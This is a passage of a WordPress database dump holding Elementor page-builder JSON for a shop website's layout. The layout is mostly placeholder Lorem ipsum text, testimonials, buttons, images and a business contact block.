Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8812,1520,'_elementor_page_assets','a:0:{}'),(8814,1521,'_elementor_edit_mode','builder'),(8815,1521,'_elementor_template_type','wp-page'),(8816,1521,'_elementor_version','3.7.8'),(8817,1521,'_wp_page_template','elementor_canvas'),(8818,1521,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":88.899000000000001,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":11.054},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John 